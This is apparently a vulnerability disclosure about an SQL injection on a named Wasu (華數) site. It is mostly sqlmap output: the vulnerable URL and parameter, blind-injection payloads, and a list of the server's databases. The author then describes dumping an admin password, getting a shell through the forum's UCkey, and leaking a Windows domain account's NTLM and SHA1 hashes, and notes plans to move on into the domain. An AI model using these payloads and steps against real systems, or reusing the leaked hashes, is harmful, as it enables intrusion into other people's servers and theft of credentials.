SQL injection vulnerability on a Wasu (華數) site
http://os.wasu.cn/mp/mp.php?id=330
sqlmap identified the following injection points with a total of 93 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=330 AND 5132=5132
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=330 AND (SELECT * FROM (SELECT(SLEEP(5)))msCa)
---
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
available databases [21]:
[*] `lt-dx`
[*] adbbs
[*] bbsx
[*] computer
[*] disk
[*] ftp
[*] information_schema
[*] jdhwx
[*] ks
[*] main
[*] mysql
[*] new
[*] qyks
[*] softdown
[*] tj
[*] ucenter
[*] uchome
[*] wjhy
[*] yuangong
[*] zzynetdisk
[*] zzysupesite
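The administrator password was dumped from the adbbs database. Because the forum is DZ 2.5, the UCkey was used to get a shell directly.
Next, dumping passwords: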
[00000002] Primary
* Username : WWWOS$
* Domain : WASU
* NTLM : a8b75cb78bf35729ee365d3bf3e039f9
* SHA1 : d9607a36d353b266f83ffd653df0597855d8703c
注釋 加入到域中的所有工作站和服務器
成員
命令成功完成。
D:\APMServ5.2.6\www\htdocs\os.wasu.cn\adbbs\config\> hostname
wwwos
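The host is inside the domain (possibly with domain admin rights). With a proxy set up, it should be possible to carry out penetration of the domain.
Solution:
Thoroughly audit for SQL injection.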